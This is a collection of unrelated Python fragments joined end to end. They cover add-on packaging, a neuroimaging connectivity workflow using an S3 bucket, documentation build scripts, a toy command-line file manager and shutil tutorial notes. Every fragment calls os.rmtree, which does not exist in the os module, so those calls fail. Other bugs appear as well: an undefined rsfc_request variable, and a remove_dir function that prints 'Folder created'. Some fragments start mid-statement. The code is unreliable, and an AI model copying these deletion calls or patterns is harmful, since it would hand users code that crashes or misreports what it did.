print(installedpath) os.mkdir(installedpath) else: try: os.rmtree(os.path.join(addonpath,addon_name+"_"+version,\ "__pycache__")) except: print("No cache to delete") for fil in files: stagefile = os.path.join(stagepath, fil) p = Popen(['mv', stagefile, installedpath], stdin=PIPE, stdout=PIPE, stderr=PIPE) stdout, err = p.communicate(b"") shutil.rmtree(stagepath) os.rename(stagepath + '.zip', os.path.join(build_dir, stagepath + '.zip'))
def niconn_workflow(mask_img=None, prefix=None, output_dir=None, ns_data_dir=None, rs_data_dir=None, work_dir=None): if mask_img is None or not op.isfile(mask_img): raise Exception('A valid NIFTI file is required!') if prefix is None: prefix = op.basename(mask_img).split('.')[0] if output_dir is None: output_dir = op.join(op.dirname(op.abspath(mask_img)), prefix) os.makedirs(output_dir, exist_ok=True) macm_out_dir = op.join(output_dir, 'macm') os.makedirs(macm_out_dir, exist_ok=True) rsfc_out_dir = op.join(output_dir, 'rsfc') os.makedirs(rsfc_out_dir, exist_ok=True) if ns_data_dir is None: ns_data_dir = op.join(output_dir, 'neurosynth_dataset') os.makedirs(ns_data_dir, exist_ok=True) if rs_data_dir is None: rs_data_dir = op.join(output_dir, 'hcp1200_resting-state') if not op.isdir(rs_data_dir): os.makedirs(rs_data_dir) download_hcp = True if work_dir is None: work_dir = op.join(output_dir, 'niconn-work') os.makedirs(work_dir, exist_ok=True) macm_work_dir = op.join(work_dir, 'macm') os.makedirs(macm_work_dir, exist_ok=True) rsfc_work_dir = op.join(work_dir, 'rsfc') os.makedirs(rsfc_work_dir, exist_ok=True) img = nib.load(mask_img) inds = np.nonzero(img.get_data()) inds = np.transpose(inds) macm_suffix = 'logp_level-voxel_corr-FWE_method-permutation' rsfc_suffix = 'thresh_zstat' for tmpind in inds: vox = np.dot(img.affine, np.append(tmpind, 1)) vox = vox[0:3].astype(int) coords_str = '{x}_{y}_{z}'.format(x=str(vox[0]), y=str(vox[1]), z=str(vox[2])) #macms first macm_get_request = requests.get( 'https://niconn.s3.amazonaws.com/macm/{coords_str}/{coords_str}_{macm_suffix}.nii.gz' .format(coords_str=coords_str, macm_suffix=macm_suffix)) if macm_get_request.status_code == 404: tmp_work_dir = op.join(macm_work_dir, coords_str) os.makedirs(tmp_work_dir, exist_ok=True) macm_workflow(x=vox[0], y=vox[1], z=vox[2], ns_data_dir=ns_data_dir, output_dir=tmp_work_dir) suffix = [ 'z', 'logp_level-voxel_corr-FWE_method-permutation', 'logp_level-cluster_corr-FWE_method-permutation' ] for tmp_suffix in suffix: tmp_fn = op.join( tmp_work_dir, '{coords_str}_{suffix}.nii.gz'.format( coords_str=coords_str, suffix=tmp_suffix)) aws_fn = op.join('macm', coords_str, op.basename(tmp_fn)) macm_put_request = requests.post( 'https://niconn.s3.amazonaws.com/', files={'file': open(tmp_fn, 'rb')}, data={'key': aws_fn}) os.rmtree(tmp_work_dir) macm_get_request = requests.get( 'https://niconn.s3.amazonaws.com/macm/{coords_str}/{coords_str}_{macm_suffix}.nii.gz' .format(coords_str=coords_str, macm_suffix=macm_suffix)) with open( op.join( macm_work_dir, '{coords_str}_{suffix}.nii.gz'.format( coords_str=coords_str, suffix=macm_suffix)), 'wb') as f: f.write(macm_get_request.content) #now resting-state rsfc_get_request = requests.get( 'https://niconn.s3.amazonaws.com/rsfc/{coords_str}/{coords_str}_{rsfc_suffix}.nii.gz' .format(coords_str=coords_str, rsfc_suffix=rsfc_suffix)) if rsfc_get_request.status_code == 404: tmp_work_dir = op.join(rsfc_work_dir, coords_str) os.makedirs(tmp_work_dir, exist_ok=True) rs_workflow(x=vox[0], y=vox[1], z=vox[2], rs_data_dir=rs_data_dir, output_dir=tmp_work_dir) suffix = ['tstat1', 'tstat1_thr001', 'vox_corrp'] for tmp_suffix in suffix: tmp_fn = op.join( tmp_work_dir, '{coords_str}_{suffix}.nii.gz'.format( coords_str=coords_str, suffix=tmp_suffix)) aws_fn = op.join('rsfc', coords_str, op.basename(tmp_fn)) macm_put_request = requests.post( 'https://niconn.s3.amazonaws.com/', files={'file': open(tmp_fn, 'rb')}, data={'key': aws_fn}) os.rmtree(tmp_work_dir) rsfc_get_request = requests.get( 'https://niconn.s3.amazonaws.com/rsfc/{coords_str}/{coords_str}_{rsfc_suffix}.nii.gz' .format(coords_str=coords_str, rsfc_suffix=rsfc_suffix)) with open( op.join( rsfc_work_dir, '{coords_str}_{suffix}.nii.gz'.format( coords_str=coords_str, suffix=rsfc_suffix)), 'wb') as f: f.write(rsfc_request.content) #evaluate MACMs now macm_img_list = sorted( glob( op.join(macm_work_dir, '*_{suffix}.nii.gz'.format(suffix=macm_suffix)))) fishers_workflow(img_list=macm_img_list, prefix='ibma_{prefix}'.format(prefix=prefix), output_dir=macm_out_dir) macm(prefix='true_{prefix}'.format(prefix=prefix), mask=mask_img, output_dir=macm_out_dir, ns_data_dir=ns_data_dir) #evalute rsFC now rsfc_img_list = sorted( glob( op.join(rsfc_work_dir, '*_{suffix}.nii.gz'.format(suffix=rsfc_suffix))))
len(notFoundInRow[:-2].split(",")) ) #If an old items directory and list exist if os.path.isdir("../data/items"): oldSize = sum( os.path.getsize(f) for f in os.listdir("../data/items") if os.path.isfile(f) ) newSize = sum( os.path.getsize(f) for f in os.listdir("../data/items" + startTime) if os.path.isfile(f) ) #If the new list is bigger than the old one if newSize > oldSize - 1024: #Remove the old directory os.rmtree("../data/items") #Rename the new directory to replace the old one os.rename("../data/items" + startTime, "../data/items") print "\nNew item list has been created and replaced the old one." print "You can find the new data in and ../data/items/" #If the new list is smaller else: print "\nNew item list was smaller than old list; both files retained." print "You can find the new data in and ../data/items" + startTime + "/" #If both the old items directory and list did not exist else: #Delete the old directory if it exists if os.path.isdir("../data/items"): os.rmtree("../data/items") #Rename the new directory to replace the old ONE os.rename("../data/items" + startTime, "../data/items")
def remove_dir(path): try: os.rmtree(path) print('Folder created at {}'.format(path)) except FileExistsError: print('file already exists')
def main(): build_pdf = os.environ.get('METPLUS_DOC_PDF') if build_pdf: print("PDF output enabled") # check if sphinx_gallery module is available and error/exit if not sphinx_gallery_spec = importlib.util.find_spec("sphinx_gallery") if sphinx_gallery_spec is None: print( "ERROR: Must have sphinx_gallery Python module installed to build documentation" ) sys.exit(1) # regex expressions to remove from HTML output regex_compiles = [ re.compile('<p><a class=\"reference download internal\".*?</p>'), re.compile('<div class=\"sphx-glr-download-link-note[\s\S]*?</div>', re.MULTILINE), re.compile('<p class=\"sphx-glr-timing.*?</p>'), re.compile('<p>sphinx_gallery_thumbnail_path.*?</p>'), ] # docs directory docs_dir = os.getcwd() # generated use case HTML output generated_dir = os.path.join(docs_dir, '_build', 'html', 'generated') # User's Guide use case HTML output users_guide_dir = os.path.join(docs_dir, '_build', 'html', 'Users_Guide') # directory where doxygen Makefile exists doxygen_dir = os.path.join(docs_dir, 'doxygen', 'run') # run make to generate the documentation files run_command(f"make clean html {'pdf' if build_pdf else ''}", docs_dir) # build the doxygen documentation run_command("make clean all", doxygen_dir) # copy doxygen documentation into _build/html/doxygen doxygen_generated = os.path.join(docs_dir, 'generated', 'doxygen', 'html') doxygen_output = os.path.join(docs_dir, '_build', 'html', 'doxygen') # make doxygen output dir if it does not exist if os.path.exists(doxygen_output): print(f"Removing {doxygen_output}") os.rmtree(doxygen_output) print( f"Copying doxygen files from {doxygen_generated} to {doxygen_output}") shutil.copytree(doxygen_generated, doxygen_output) # remove download buttons print(f"Removing download buttons from files under {generated_dir}") for dirpath, _, all_files in os.walk(generated_dir): for filename in sorted(all_files): doc_file = os.path.join(dirpath, filename) if not doc_file.endswith('.html'): continue with open(doc_file, 'r+') as file_handle: text = file_handle.read() for regex_compile in regex_compiles: text = re.sub(regex_compile, '', text) file_handle.seek(0) file_handle.write(text) file_handle.truncate() # create symbolic links under Users_Guide directory to point to dirs under generated run_command("ln -s ../generated/met_tool_wrapper", users_guide_dir) run_command("ln -s ../generated/model_applications", users_guide_dir) print("Documentation build completed")
def main(): # check if release is in any command line argument is_release = any(['release' in arg for arg in sys.argv]) skip_doxygen = any(['skip-doxygen' in arg for arg in sys.argv]) # check if sphinx_gallery module is available and error/exit if not sphinx_gallery_spec = importlib.util.find_spec("sphinx_gallery") if sphinx_gallery_spec is None: print( "ERROR: Must have sphinx_gallery Python module installed to build documentation" ) sys.exit(1) # regex expressions to remove from HTML output regex_compiles = [ re.compile('<p><a class=\"reference download internal\".*?</p>'), re.compile('<div class=\"sphx-glr-download-link-note[\s\S]*?</div>', re.MULTILINE), re.compile('<p class=\"sphx-glr-timing.*?</p>'), re.compile('<p>sphinx_gallery_thumbnail_path.*?</p>'), ] # docs directory # docs_dir will be set to the directory that this script is in # __file__ is a variable that contains the path to the module that is # currently being imported docs_dir = os.path.abspath(os.path.dirname(__file__)) package_dir = os.path.join(docs_dir, os.pardir, 'metplus') # update release_date file if creating a release if is_release: write_release_date_file(package_dir) # generated use case HTML output generated_dir = os.path.join(docs_dir, '_build', 'html', 'generated') # User's Guide use case HTML output users_guide_dir = os.path.join(docs_dir, '_build', 'html', 'Users_Guide') # directory where doxygen Makefile exists doxygen_dir = os.path.join(docs_dir, 'doxygen', 'run') # run make to generate the documentation files run_command(f"make clean html", docs_dir) if not skip_doxygen: # build the doxygen documentation run_command("make clean all", doxygen_dir) # copy doxygen documentation into _build/html/doxygen doxygen_generated = os.path.join(docs_dir, 'generated', 'doxygen', 'html') doxygen_output = os.path.join(docs_dir, '_build', 'html', 'doxygen') # make doxygen output dir if it does not exist if os.path.exists(doxygen_output): print(f"Removing {doxygen_output}") os.rmtree(doxygen_output) print( f"Copying doxygen files from {doxygen_generated} to {doxygen_output}" ) shutil.copytree(doxygen_generated, doxygen_output) # remove download buttons print(f"Removing download buttons from files under {generated_dir}") for dirpath, _, all_files in os.walk(generated_dir): for filename in sorted(all_files): doc_file = os.path.join(dirpath, filename) if not doc_file.endswith('.html'): continue with open(doc_file, 'r+') as file_handle: text = file_handle.read() for regex_compile in regex_compiles: text = re.sub(regex_compile, '', text) file_handle.seek(0) file_handle.write(text) file_handle.truncate() # create symbolic links under Users_Guide directory to point to dirs under generated run_command("ln -s ../generated/met_tool_wrapper", users_guide_dir) run_command("ln -s ../generated/model_applications", users_guide_dir) warning_file = os.path.join(docs_dir, '_build', 'warnings.log') if os.stat(warning_file).st_size == 0: print(f"No warnings found, removing {warning_file}") os.remove(warning_file) print("Documentation build completed")
import os import shutil while True: arr = input().split() if arr[0] == 'create_folder': os.mkdir(arr[1]) if arr[0] == 'delete_folder': os.rmtree(arr[1]) if arr[0] == 'remove_folder': shutil.move(arr[1], arr[2]) if arr[0] == 'copy_folder': shutil.copytree(arr[1], arr[2]) if arr[0] == 'create_file': f = open(arr[1], 'w') f.close() if arr[0] == 'delete_file': os.remove(arr[1]) if arr[0] == 'remove_file': shutil.move(arr[1], arr[2]) if arr[0] == 'copy_file': shutil.copy(arr[1], arr[2])
shutil.copy('eggs.txt', 'C:\\delicious\\eggs2.txt') shutil.copytree('C:\\bacon', 'C:\\bacon_backup') #%% moving shutil.move('C:\\bacon.txt', 'C:\\eggs') shutil.move('spam.txt', 'c:\\does_not_exist\\eggs\\ham') # ERROR #%% deleting - permanently !!! os.unlink('path') os.rmdir('path') # only empty folders os.rmtree('path') for filename in os.listdir(): if filename.endswith('.rxt'): #os.unlink(filename) # be carefull print(filename) # run it first to see what you are to delete #%% it's better to send to system Trash # install 3d party send2trash # $ pip install send2trash import send2trash baconFile = open('bacon.txt', 'a') # creates the file baconFile.write('Bacon is not a vegetable.')
def remove_extra_files(): # Remove github actions files unless they are necessary if context['use_github'] == 'no' or context['continuous_integration'] != 'github_actions': # remove the github directory os.rmtree('.github/')